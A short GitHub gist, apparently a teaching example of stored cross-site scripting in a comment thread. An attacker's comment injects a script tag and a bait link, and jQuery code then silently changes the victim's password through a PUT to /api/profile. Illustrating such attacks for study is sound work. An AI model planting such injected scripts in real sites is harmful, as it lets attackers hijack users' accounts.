Skip to content

Instantly share code, notes, and snippets.

@kidtronnix
Last active August 29, 2015 14:28
Show Gist options
  • Save kidtronnix/ddbb60af1752d4348f1b to your computer and use it in GitHub Desktop.
Save kidtronnix/ddbb60af1752d4348f1b to your computer and use it in GitHub Desktop.
XSS Example
<!-- User -->
<comment>
Hi can anyone recommend a good film?
</comment>
<!-- Attacker-->
<comment>
<script src="xss.js"></script>
I like star wars!
<a id="its-a-trap" href="#">Check it out.</a>
</comment>
$( "#its-a-trap" ).click(function() {
$.ajax({
type: "PUT",
url: '/api/profile',
data: { password: 'JEDI WAS HERE' }
});
});
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment